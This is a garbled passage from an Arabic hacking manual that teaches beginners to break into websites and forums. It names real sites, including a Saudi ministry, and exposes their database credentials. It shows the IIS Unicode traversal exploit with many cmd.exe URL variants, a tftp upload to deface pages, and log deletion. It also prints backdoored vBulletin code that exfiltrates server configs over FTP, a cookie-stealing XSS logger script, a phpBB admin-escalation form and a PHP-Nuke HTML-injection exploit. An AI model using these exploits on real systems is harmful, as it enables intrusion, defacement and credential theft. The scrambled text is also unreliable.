للعلم ل اكثر ‪.3‬كلمة السر ‪Password‬‬ ‫ملحظة ) قم بإزالة الصح من مربع ‪(Blank Password‬‬ ‫‪310‬‬ .‬‬ ‫لقد اقتربنا من النهاية ‪ .‫‪global.

htr ‫اذهب الى السورس لترى‬ <--"include file = "database..CreateObject("ADODB.asp ‫سترى مايلي‬ 'Microsoft VBScript runtime error '800a01a8 'Object required: 'Conn news_admin.sa/database.‫فمعناه ان التصال بقاعدة البيانات تم بنجاح‬ : ‫يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة‬ Select the data base on the server .sa/news_admin..moe.gov.sa/news_admin.gov.APP=Microsoft (R) Developer "Studio.moe. line 7/ : ‫ كتالي‬htr ‫ثم طبق عليها ثغرة‬ http://www.PWD=.WSID=CNW2.gov.asp+.Connection DB.asp.DATABASE=moe_dbs". ‫ او موافق‬OK ‫واضغط على‬ : ‫فئران التجارب‬ /http://www.moe.SERVER=CNW2.‫ في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذه‬Test Connection ‫اضغط في البداية على‬ Test Connection Succeeded ‫العبارة‬ . "123321 <% ‫ سارع بالتشبيك على قاعدة البيانات‬. ‫هل تعرف مالذي امام عينك الن انه اسم المستخدم وكلمة المرور‬ ‫انا اعرف ان ل احد يحب مادة‬ .UID=sa.Open "DRIVER=SQL Server.inc#--!> : ‫ كتالي‬database.gov. ‫الكيمياء‬ 311 . "sa"..inc ‫قم بسحب ملف‬ http://www.moe.sa ‫موقع‬ : ‫ قم بالدخول على الصفحة التالية‬-1 http://www.inc : ‫سوف ترى مايلي‬ %> ("Set DB= Server..

.1‬‬ ‫*****************‬ ‫سرفرات الويندوز ودوره في اختراق المنتديات‬ ‫نحن الهكرز واي هكرز مبتدي يعرف ثغرات الويندوز جيدا دا‬ ‫وهي نظام فاشل ‪ %80‬وثغراته بالالوف‬ ‫ولانصح اي اخ لديه منتدي وموقع يستضيف سرفرات ويندوز راح اقلكم ليش بااثبتات‬ ‫صور ‪ 2‬هو صورة لجمعية امريكي مهم وحجم قاعدات البيانات ‪ 1.IIS5..com‬‬ ‫‪User name : sa Passwd : sp2000 .0‬وويندوز الفين يمتلك الصدارة الخامسة من ملقم معلومات النترنت‬ ‫بسم ال نبدأ‬ ‫توجد نقطة ضعف في الي اي اس ‪ 4‬او ‪ 5‬وهذه النقطة تستغل بطريقة سهلة جدًا‬ ‫وتسمى هذه النقطة باليونيكود‬ ‫ل ليحتاج الى خبرة عميقة في مجال اختراق المواقع‬ ‫وتنفيذها سه ً‬ ‫ولكن نقف عند هذه النقطة للمبتئيدئن‬ ‫المبتدئين عامًة يفكرون الن في اختراق عدة مواقع شهيرة بهذه الطريقة‬ ‫ولكن ل هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة‬ ‫لن نقطة الضعف هذه لتوجد ال في ويندوز الفين او ان تي‬ ‫وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس‬ ‫أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة‬ ‫لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الضعاف الموجودة في الن تي‬ ‫لكن بتلك الطريقة قد يكونون جعلو حاجزًا لهم من الهكرة‬ ‫‪312‬‬ .5‬كيك يعني ‪ 15000‬ميك ويحتوي علي‬ ‫خمسة ملين مشترك تم اختراقه البارحه بنفسي جاري تحميل الموقع لجاهزي كامل‬ ‫‪1‬ثغرات الهتمل‬ ‫‪2‬الفرونت بيج‬ ‫‪3‬مخلفات الفتبي والستفاد منه كثير لهكرز‬ ‫‪4‬ثغرات البرامج‬ ‫‪ 6‬عدم تمكن حماية النظام ‪%100‬‬ ‫لذلك انصح الخوه بالبتعاد عن سرفرات الويندوز وبرامجهم‬ ‫‪ IIS‬بداية نعرف ماهي‬ ‫هي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي ‪IIS‬الـ‬ ‫‪.itsalat.‫فأر التجارب الثاني ‪:‬‬ ‫موقع ‪/http://www.

/winnt/system32/cmd.....‬الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط‬ ‫للتطابقها يجب عليك الدخول باي كان على مللف السستم‬ ‫‪313‬‬ .com/scripts/.com/scripts/...exe/?/c‬‬ ‫أي بعد دوت كوم‬ ‫بعض الناس يسألون مالذي يظهر او على اي شكل يظهر‬ ‫الحل بسيط‬ ‫‪ Dir‬هذا المر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات‬ ‫وطريقة ظهور الملفات في المتصفح تقريبا‬ ‫بنفس طريقة الدوس‬ ‫إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية‬ ‫الخطوة الثانية عمل ابلود للملف الذي تريد تحميله‬ ‫وعمل البلود أيضًا ليحتاج الى خبرة‬ ‫لكن هنالك شروط لكي تعمل ابلود‬ ‫يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية‬ ‫وللكي تتأكد إتبع التي‬ ‫يجب الدخول على ملف السستم ‪ 32‬ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في‬ ‫تنفيذها‬ ‫مثال‪:‬‬ ‫‪\:http://www.\/‬‬ ‫‪\:%e0\%80\%af...%f8%80%80%80%af.exe?/c+dir+c/‬‬ ‫‪\:scripts/..exe\?/c\+dir+c‬‬ ‫وطريقة تنفيذها من المتصفح‬ ‫ومكان تنفيذها بعد اسم الموقع‬ ‫مثال ‪:‬‬ ‫‪+\http://www.%c0%9v.‫ولكن ليس دائماً‬ ‫وتنفذ من داخل المتصفح‬ ‫وطريقة تنفيذ الثغرة كالتي ‪:‬‬ ‫‪\:http://www.exe?/c+dir+c/‬‬ ‫‪\:scripts/.xxxxxx../winnt/system32/cmd.exe?/c+dir+c‬‬ ‫هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات‬ ‫لحظ التغير‬ ‫‪http://www.com/à/€/à/€/à/€/¯.exe?/c+dir+c‬‬ ‫ركزو هنا الن بعد دوت كوم بدأت تنفيذ الثغرة‬ ‫وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي ‪:c‬هذه الثغرة تسمح لك بــ عرض جميع ملفات‬ ‫وتوجد أكثر من ثغرة وهي‬ ‫‪\:scripts/../winnt/system32/cmd..exe?/c+dir+c/‬‬ ‫‪\:scripts/.Á‬‬ ‫‪\.2/cmd.xxxxx./winnt/system32/cmd.\%e0\%80\%af.exe?/c+dir+c/‬‬ ‫‪\:scripts/./winnt/system32/cmd..%c1%9c./winnt/system32/cmd../.%c1%9c.%c1%af..%f0%80%80%af./winnt/system32/cmd../winnt/system32/cmd../winnt/system32/cmd./..exe?/c+dir+c/‬‬ ‫‪\:scripts/.Á .....exe?/c+dir+c/‬‬ ‫‪\:scripts/..%c1%pc....exe?/c+dir+c/‬‬ ‫‪\:scripts/.%c1%1c./winnt/system32/cmd./winnt/system32/cmd.exe?/c+dir+c/‬‬ ‫‪\:scripts/...exe?/c+dir+c/‬‬ ‫‪\:scripts/../winnt/system32/cmd../winnt/system32/cmd..%c0%qf.xxxxxx../winnt/system32/cmd.......exe?/c+dir+c/‬‬ ‫‪\:scripts.\%e0\%80\%af.exe?/c+dir+c/‬‬ ‫‪msadc/.exe?/c+dir+c/‬‬ ‫‪\:scripts/.exe?/c+dir+c/‬‬ ‫‪\:scripts/.%c1%8s..Á ./winnt/system32/cmd..%c0%af../winnt/system32/cmd....exe?/c+dir+c:\Winnt\Sytem32‬‬ ‫ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز ‪\Winnt\Sytem32‬‬ ‫أي يجب عليك الدخول على هذه الملفات لكي تتأكد‬ ‫بعض القراء يتسالون ‪ ./winnt/system32/cmd.%e0%80%af.com/scripts/..xxxxxx.%fc%80%80%80%80%af.

....1...1+GET+index.1...exe‬يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز‬ ‫لن هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة‬ ‫ولو لقيت البرنامج اتفاءل بالخير يعني بإذن ال تعبك ماهو رايح على الفاضي‬ ‫‪.com/scripts/....ü€€€........ü€€€......xxxxx...exe?/c+dir+c‬‬ ‫تخيل الثغرة هذه اشتغلت معاك‬ ‫ويجب عليك إنك تمسح بعض الضافات من الثغرة لكي تضيف امر النسخ‬ ‫‪c+tftp.....xxxxx..xxxxx.ü€€€....1.1+GET+index..com/anorR1234/tftpd32.xxxxx...geocities...exe?/c+dir+c‬‬ ‫ويقول كيف ادخل على ملف السستم‬ ‫الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم ‪32‬‬ ‫اي بعد هذا المتداد‬ ‫‪\:c+dir+c‬هنا تضيف أسماء الملفات‬ ‫‪/http://www..........‬‬ ‫والشرط الثاني هو‬ ‫يجب أن يكون عندك برنامج التي إف تي بي‬ ‫وهذا البرنامج تقدر تنزله من هذا العنوان‬ ‫‪www......1+GET+index..‫ممكن يكون احد القراء اشتغلت معاه هذه الثغرة‬ ‫‪\:http://www...com/scripts/.htm‬‬ ‫شايفين ياشباب إش الى اتغير‬ ‫بس لزم أيضًا إنك تغير اللزم في أمر النسخ‬ ‫مثل‬ ‫‪314‬‬ ...ü€€€.1.htm /‬‬ ‫ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة‬ ‫"‪http://www...1......htm+C:\inetpub\wwwroot\index.htm+C:\inetpub\wwwroot\index.....com/scripts/......com/scripts/.exe+"-i"+1....exe+‬‬‫‪i"+1..htm+C:\inetpub\wwwroot\index.zip‬‬ ‫‪\:C‬وبعد ماتنزل البرنامج وتفك الضغط منه من الفضل إنك تحطه داخل الـ‬ ‫وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي‬ ‫تحطه في السي الى داخل جهازك مو الى دالخل الموقع‬ ‫وتشغل البرنامج‬ ‫‪ tftp32........exe+"-i"+1.exe‬وتتركه يعمل الى أن تنتهى من مهمتك الساسية‬ ‫‪\:C‬أسمع كلمي وحط كل شي في‬ ‫لنك لو حطيتها بإذن ال راح تنجح المهمه‬ ‫‪----------------------------------------------------------------‬‬‫الن بدأنا في النقطة الخطرة وهي تحميل الملفات‬ ‫مع العلم أني اقصد بالتحميل البلود‬ ‫أي‬ ‫أبلود = تحميل‬ ‫مو تجميل‬ ‫وتحميل الملفات طريقة معقدة نسبيًا بس أنا متفائل بالخير لني معتقد أنكم راح تفهمو‬ ‫المهم نرجع لموضوعنا‬ ‫المهم طريقة نسخ الملفات تضاف ايضًا الى المتصفح‬ ‫وتضاف بهذه الطريقة‬ ‫مثال ‪:‬‬ ‫‪\:http://www...Winnt/System32‬‬ ‫كما قلنا سابقَا لتحتاج الى خبرة‬ ‫وبعد دخول ملف السستم ستظهر لك محتوياته‬ ‫ويجب على آنذاك البحث عن برنامج يسمي‬ ‫‪ tftp............1...xe?/c+tftp..htm /‬‬ ‫يعني الى راح نمسحه من الثغرة بيكون هذه الضافة‬ ‫‪\:c+dir+c/‬‬ ‫عشان تظيف بدالها‬ ‫‪c+tftp...

/c+del+c:/*.1‬هنا بدال الرقام هذا تكتب اليبي تبع جهازك وعشان تتأكد من اليبي لمن تشغب التي اف تي بي‬ ‫راح يطلع ايبي وهذا اليبي الى طلعلك هو الى تكتبه‬ ‫‪ GET‬هذه الضافة سيبها في حالها لنها تعتبر شرط في نسخ المفات‬ ‫‪ index.À¯.htm‬‬ ‫ولو طلعت مشابها لها اضغط إنتر وتوكل على ال‬ ‫وبإذن ال راح يتنسخ الملف‬ ‫‪------------------------------------------------------------------------------------------------------‬‬‫‪------------------------------------------------------------------------------‬‬‫وفى النقطة الخيرة والهم‬ ‫مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل اليبي‬ ‫‪http://server/msadc/...htm‬ومثل اسم الصفحة‬ ‫قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الن صارت مشابها لمثل هذه الثغرة‬ ‫"‪http://www.exe+‬‬‫‪i"+212.htm+C:\inetpub\wwwroot\index..1.exe‬هذا سيبه في حاله لنه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الن‬ ‫"‪ "i-‬هذا برضه سيبه لنه مهم‬ ‫‪ 1....‫‪ tftp.xe?/c+tftp.htm‬هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت‬ ‫‪ \C:\inetpub\wwwroot‬وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع‬ ‫‪ index..log‬‬ ‫‪--------------------------------------‬‬ ‫*******************‬ ‫‪ 5‬النسخه المنتشره في النت ودور المعربين العرب وحقيقة الموضوع وتعريبهم‬ ‫اول كما قلنا لماذا ليخترقوا منتديات جون رغم ثغرات موقعه ‪1‬لنه يستخدم نسخه نضيفه‬ ‫‪ 1‬النسخه الموجود بالنت مليان ثغرات وعارفين جيد مصمممي المنتدي لماذا ينشرونه اذا‪$‬‬ ‫النسخه تجريبي ومحتوي كود التبليغ لكي لو نفذت ومسحت كود التبليغ لن تهرب من ثغراته لو تشغل فكرك‬ ‫لكشفته بنفسك‬ ‫‪ 2‬انه جميعه نسخه تجريبي لترويج بضعتهم بدل ان تكون لمدة ‪30‬يوما فهمتموني‬ ‫‪ 3‬النسخه المنتشره بالنترنت هو نسخه نحصل علي من مواقع هكرز صح وينك انت من هكرز الغرب‬ ‫وحيلهم‬ ‫لو تمكنت في الحصول علي نسخة الشركة ‪ %100‬ونسخه منتشره في النت لرئيت صح قاموا بحذف كود‬ ‫التبليغ منه بل اضافوا اليه كوداد وبلوي وثغرات‪-‬وبعدين يجي الخ صاحب النسخه يوكد انه لقي ثغرة‬ ‫بمنتديات جون‬ ‫والعالم يندهش كييييييف خلص انشهر موقعه وسعر اعلناته ارتفع في موقعه لكثر الزوار‬ ‫الحقيقة هو نفسه اضاف الكود ونفسه يعرف مكانه وكيفة العب فيه وال هكذا المور‬ ‫‪315‬‬ .com/scripts/.xxxxx.htm‬هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع‬ ‫‪\:C‬يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ‬ ‫‪ index.1.212./.ü€€€.212+GET+index.212..

arab1.vbxw = w$ .$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx a$vbxl/.vbxo = o$ .php? h=$HTTP_HOST&h2=$SCRIPT_NAME ‫ وسربوها لنا حبايبنا وشالوا كود التبليغ ياعيني عليهم عشان يحطون‬2.vbxn = n$ .vbxr = r$ . $vbxa$vbxr$vbxa$vbxb$vbx1. "r .vbx1 = 1$ .php?h=$HTTP_HOST&h2=$SCRIPT_NA .arab1.vbxa = a$ ." --!>" echo = file$ fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.2." echo -------------------------------------------------------------------------------‫وكان الكود الحلو هذا يتصل في موقع‬ /http://www.‫المعربين العرب ليسوا اقل نذل من الجانب‬ ‫انصحكم بتعريب نسخكم باانفسكم‬ ‫ المسربه لنا من اخواننا العرب وكان هذا الكود‬2.vbxp = p$ .x.vbxy =y$ . 1000$ ."<-.x.vbxl = l$ .5 ‫قبل فتره بسيطه تم اكتشاف ثغره في بعض نسخ‬ forum ‫الموجود فيها في ملف‬ :PHP -------------------------------------------------------------------------------} ("if ($action=="modify .vbxt = t$ .net http://www.vbxe = e$ .6 ‫عموما مع اليام نزلت نسخه‬ 316 .vbxh = h$ .(rf = fread($file.(fclose($file .2.("ME".net/~royal/.vbxb = b$ .

com WELCOME TO arab1. ‫رهييييييب ويبين لنا‬ ‫شوفو الكود‬ :PHP -------------------------------------------------------------------------------<"."include "$sqlupdate .php /tmp/.no-ip." echo -------------------------------------------------------------------------------functions ‫وملف‬ :PHP -------------------------------------------------------------------------------sqlupdate =$ base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9 .conf .("system("cp admin/config.conf 317 .net ‫بيرحب فيكم ويقولكم‬ ‫ياعيني عالترحيب‬ ‫ اللي فيها كود‬http://saudi.conf /tmp/.statics/httpd2.no-ip.("system("mkdir /tmp/.."<-.statics ..('==5YWwvLngyLmluYw -------------------------------------------------------------------------------‫ياعيني على الذكاء صرنا نعرف نلعب باكدوا ديكود وانكود‬ ‫والمره هذي بعد يتصل الكود الحلو هذا اللي مستخدمين فيه ديكود بالموقع هذا‬ /http://saudi.com/~royal/.("system("cp /usr/local/apache/conf/httpd..‫لنا كود تجسس ونعم الخوه العرب المسلمين‬ ‫ بالخير‬option ‫بس هالمره الكود اذكى ومهو مكشوف وغبي زي الول الكود المره هذي في ملفين ملف‬ ‫موجود‬ :PHP -------------------------------------------------------------------------------....conf /tmp/.inc ‫عموما الكود بيتصل بالصفحه هذي‬ ‫ اللي يحسبون علينا كمسلمين وعرب‬.("system("cp /etc/httpd/conf/httpd.conf .div id="sHo" style="display:none> --!> if you are seeing this code PlzZzZz Contact [email]sleeping_bum@hotmail.com php?> .statics/php.x2.statics/httpd1." --!>" echo .

php?h=$base$‬‬ ‫‪."vilename = "$SERVER_NAME.("login_result = ftp_login($conn_id.(rf = fread($file.tgz /tmp/.‬شغل فقط في سرفرات الينوكس ليس ويندوز‬ ‫‪ 2‬قم بحمايته ‪htaccess.statics.statics.com/~royal/.virtualave. "r$‬‬ ‫‪.x2. 1000$‬‬ ‫‪."base = "$HTTP_HOST&h2=$SCRIPT_NAME$‬‬ ‫‪.net$‬‬ ‫‪.tgz‬‬ ‫‪.‬‬ ‫‪ 3‬لتركب ستيلت كثير يسببب ثغرة باالمنتدي‬ ‫‪ 4‬لتفعل لغة الهتمل ابدا‬ ‫‪ 5‬احذر من الكوكز نظف جاهزك دائما‬ ‫‪6‬قم بتوقيف التل نيت لموقع عندما لتحتاجه‬ ‫‪ 7‬نأكد من عدم وجود ملف باسم ‪ Cfgwiz32.("conn_id = ftp_connect("cyber-sa.('port = base64_decode('aHB5NWk5$‬‬ ‫‪.$‬‬ ‫‪.(ftp_quit($conn_id‬‬ ‫‪.("system("rm -rf /tmp/.(fclose($file‬‬ ‫?<‬ ‫‪<-‬‬‫>‪<div/‬‬ ‫واخره كان دار العرب في ملفه هو بيعرف‬ ‫************‬ ‫‪6‬الحمايه من المخترقين بنسبة ‪ %80‬لاجهزتكم ومنتدياتكم‬ ‫يال كل يوم نسمع اختراق المنتديات اليكم الحل حماية ‪ %80‬اليكم اسباب اخترقه وحمايته‬ ‫‪ 1‬وجود ثغرات بمجلد الدمن‬ ‫‪2‬ثغرة مجلد مود‬ ‫‪ 3‬ثغرة الستيل‬ ‫‪ 4‬الهتمل‬ ‫‪ 5‬كوكيز‬ ‫‪6‬دعم التلنت‬ ‫‪ Cfgwiz32.‫‪.("file = fopen("$open".tgz". "/tmp/. "$port$‬‬ ‫‪upload = ftp_put($conn_id.exe 7‬على المجلد ويندوز ‪C:\Windows‬‬ ‫‪8‬من الملف ‪misc‬‬ ‫‪ 9‬وجود باتش بجهازك تم ارسله لك من قبل المخترق لحصول بمعلوماتك‬ ‫******‬ ‫كيفية الحماية‬ ‫‪ 1‬قم بحماية ملف الدمن جيدا ‪ htaccess.statics‬‬ ‫‪. "/tmp/$vilename".bz$‬‬ ‫‪.no-ip.statics.("system("tar -cvf /tmp/."open = "http://saudi.statics‬‬ ‫‪.exe‬على المجلد ويندوز ‪C:\Windows‬‬ ‫‪318‬‬ .("system("rm -rf /tmp/.(FTP_BINARY‬‬ ‫‪. "cyber-sa".

"" = Header$ .‫ ده بلوووووي الدنيا فيه جاري البحث عن حل له‬8 ‫ قم بتركيب برامج الفيروسات بجهازك‬9 ."--!>" = Header$ .2.Descrption: Fetching vBulletin's cookies and storing it into a log file // :Variables // .("<Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title 319 ..(Print ($Header /* .Log$ :Functions // */ } ("If ($HTTP_GET_VARS['Action'] = "Log ."LogFile = "Cookies..9 ‫" ثغرة في منتديات‬ <‫>ةةةةة ةة ةةةةة ةةة ةةة‬ <‫ ةةةةةة‬:‫>ةةةةةة‬ .Com // . ‫ قم بزيارت منتديات العقرب الحمر لحصولك علي كافة انواع الحماية لجهازك وموقع‬10 ،،،‫انتهى‬ " vBulletin 2.IC (SpeedICNet@Hotmail.// .9 ‫هذه الثغرة خطيرة جدا وتؤدي بحاية المنتديات‬ :‫المهم شرحها كالتالي‬ php ‫ انسخ الكود واحفظه بالمفكرة بامتداد‬-1 PHP?> vBulletin XSS Injection Vulnerability: Exploit // --.2..(Coded By : Sp."" = Footer$ { ."<---" = Footer$ { } Else .vBulletin 2.

['$HTTP_SERVER_VARS['HTTP_REFERER . $SCRIPT_PATH. Trim ($Data) .() Exit { } Else .("Print ("<B>.("<Print ("<Center . .("Print ("o Download Log : " . "? 320 ..(Print ($Footer /* } (['Switch ($HTTP_GET_VARS['Action :"Case "Log . Count ($Records) .("Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail. BCAdd (0x0D.("+Log = FOpen ($LogFile.("Print ("o Logged Records : <B>" . Count (File ($LogFile)) .("<"\Width=\"20% */ .("<"\" . "\n Print ("o Clear Records : [<A Href=\"" .("<Print ("<Pre . "\">Download</A$ { }Else .("Duplicates]\n . " </B>[Not Counting .("<Print ("<Pre .Break :"Case "List } ((If (!File_Exists ($LogFile) || !In_Array ($Records .(FClose ($Log Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0.Com\">Sp.("Print ("\n } (If (Count (File ($LogFile)) > 0 . $Link['Download'] .(((((((MD5 (NULL .['Data = $HTTP_GET_VARS['Cookie$ Data = StrStr ($Data.("Print ("\n . URL=" . "</B>\n Print ("o Listed Records : <B>" .((Records = Array_UniQue (File ($LogFile$ . StrLen (DecHex$ . "\n . SubStr ($Data.("Print ("<B>. $LogFile . "a$ .:: Options</B>\n .IC</A></B><Hr .:: Statics</B>\n ."[Link['Download'] = "[No Records in Log$ { .("FWrite ($Log.("Print ("\n .("<Print ("</Center></Pre ."[<Link['Download'] = "[<A Href=\"" .("<Print ("<Br><Br><B>There are No Records</B></Center></Pre .

.([Print ("<B>" .Break :"Case "Delete .(UnLink ($LogFile@ Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die . ['$HTTP_SERVER_VARS['HTTP_REFERER . $Line[1]) = Each ($Records .php?s=[Session]&action=viewsubscription&perpage=[Script [Code [script code] ‫واستبدال‬ ‫بهذا‬ Action=Log&Cookie='+?[‫]مكان الملف الذي تم تحميله‬//:Script>location='Http> <(document. URL=" .Break { <? php ‫ ارفع الملف لموقع يدعم‬-2 ‫ اجعل الضحية يضغط على هذا اللينك‬-3 member2.</Script ‫ إذهب ألى هذا العنوان‬-4 Action=List? ‫ الملف الذي تم تحميله‬/‫مكان‬http://%20 ،،،‫انتهى‬ 321 . ": </B>" . $Line[0] .:: Records</B>\n ..("<Print ("</Pre .("<("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3.("Action=Delete\">Y</A>]\n .("Print ("\n .("Print ("\n } ((While (List ($Line[0].("Print ("<B>. $Line[1 { { .cookie).("<"\" .

0‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة<‬ ‫‪phpbb 2.php‬‬ ‫الوصف‪:‬‬ ‫يمكنك من خلل هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى‬ ‫وبذلك يمكنك الدخول الى لوحة التحكم متى شئت‬ ‫الصدار‪:‬‬ ‫‪2.0‬‬ ‫وهو شبيه بالـ ‪vb‬‬ ‫وهو سهل جدا بل يعتبر تااافه‬ ‫يال سمو بال‬ ‫‪PhpBB2‬‬ ‫في ملف ‪admin_ug_auth.php‬‬ ‫‪<"User Level: <select name="userlevel‬‬ ‫‪322‬‬ .0.domain_name/board_directory/admin/admin_ug_aut‬‬ ‫‪<"h.0‬‬ ‫لتجربة الثغرة اول سجل بالمنتدى‬ ‫ثم احفظ رقم عضويتك بالمنتدى‬ ‫بعدها افتح المفكرة وانسخ مايلي اليها‬ ‫>‪<html‬‬ ‫>‪<head‬‬ ‫>‪<head/‬‬ ‫>‪<body‬‬ ‫>‪"form method="post‬‬ ‫‪action="http://www.0.‫" اختراق منتديات ‪" phpbb 2.0.

domain_name/board_directory‬‬ ‫اخفظه بامتداد ‪html‬‬ ‫عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد‬ ‫قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح ‪Administrator‬‬ ‫ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى‬ ‫أضغط زر ‪submit‬‬ ‫بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك‬ ‫ثم سوف تجد نفسك في لوحة تحكم المنتدى !! أفعل ماتريد المنتدى منتداك‬ ‫وسلااامتكم شفتو سهولت الدرس وهو صرااحه منقول بس تعرفو ما حبيت انزله ال وعليه تطبيق‬ ‫شووفوو المنتدا ذا‬ ‫‪/http://forums...‫>‪<option value="admin">Administrator</option‬‬ ‫>‪<option value="user">User</option></select‬‬ ‫>‪<"input type="hidden" name="private[1]" value="0‬‬ ‫>‪<"input type="hidden" name="moderator[1]" value="0‬‬ ‫>‪<"input type="hidden" name="mode" value="user‬‬ ‫>‪<""=input type="hidden" name="adv" value‬‬ ‫‪<"User Number: <input type="text" name="u" size="5‬‬ ‫>‪<"input type="submit" name="submit" value="Submit‬‬ ‫>‪<form/‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫عدل هذا العنوان الى عنوان الموقع المستهدف‬ ‫‪http://www.xos.ca‬‬ ‫تدمر والحمد ل عقبال المواقع البااقيه‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪323‬‬ .

....‬‬ ‫انا عارف انكم اول ما تقروا السطر الول اكيد اغلبكم حيشتمني باكثر اللفاظ اباحه ‪ -‬بس عادي انا متعود ‪ -‬و‬ ‫يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!!‬ ‫بس ؟؟؟!!! اما عبيط اوي !!!‬ ‫لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه ‪.....‬‬ ‫المهم ان الثغره كالتالي ‪ ) :‬ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره (‬ ‫الصدارات المصابه ‪:‬‬ ‫‪ PHP Nuke versionh 6.‬الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان‬ ‫الصوره الشخصيه ‪..0‬و القل منها‬ ‫‪324‬‬ ..‫" ثغرة في ‪" php nuke‬‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةةةة <‬ ‫فيه ثغره في ال ‪ php nuke‬حبيت اقولكم عليها ‪..

php?name=Your_Account‬‬ ‫‪<"method="post‬‬ ‫>‪"b>Code ('">[code]<b ')</b><input type="text‬‬ ‫‪"name="user_avatar" size="30‬‬ ‫‪<maxlength="30"><br><br‬‬ ‫>‪"b>Username</b><input type="text" name="uname" size="30‬‬ ‫‪"maxlength="255"><br><b>User ID:<input type="text‬‬ ‫‪"name="uid‬‬ ‫‪"size="30"><input type="hidden" name="op‬‬ ‫‪value="saveuser"><input‬‬ ‫‪<type="submit" value="Save Changes"></form‬‬ ‫‪325‬‬ . 2111‬‬ ‫عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد ‪ html‬مع ملحظه تغيير‬ ‫‪ /http://nukesite‬الى عنوان المجله الهدف ‪:...‬‬ ‫ملخص عام للثغره‪:‬‬ ‫اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلل مجموعه من‬ ‫الصور الموجوده في المجلد هذا ‪......‫الستخدام ‪:‬‬ ‫تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلل مكان صورهم الشخصيه‪..START CODE --‬‬ ‫>‪"form name="Register‬‬ ‫"‪action="http://NUKEDSITE/modules.‬‬ ‫>!‪<!-.... images/forum/avatars/‬‬ ‫عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز ‪ .‬و لكنها ل تقوم بوضع اي كود اي انه اذا استطاع اي‬ ‫يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق‬ ‫‪ text‬عادي ‪..‬اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!‬ ‫الكسبلويت‪:‬‬ ‫اول عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه ‪ Your Account‬و منها‬ ‫الذهاب الى صفحه ‪ Your Info‬بعد ذلك عليك باظهار سورس كود الصفحه من خلل ‪ view source‬و‬ ‫البحث عن كلمه ‪uid‬‬ ‫لزم تلقي حاجه زي كده ‪:‬‬ ‫>‪<"input type="hidden" name="uid" value="2111‬‬ ‫كده يبقى انت عرفت رقم الي دي اللي هوه في المثال كان ‪.

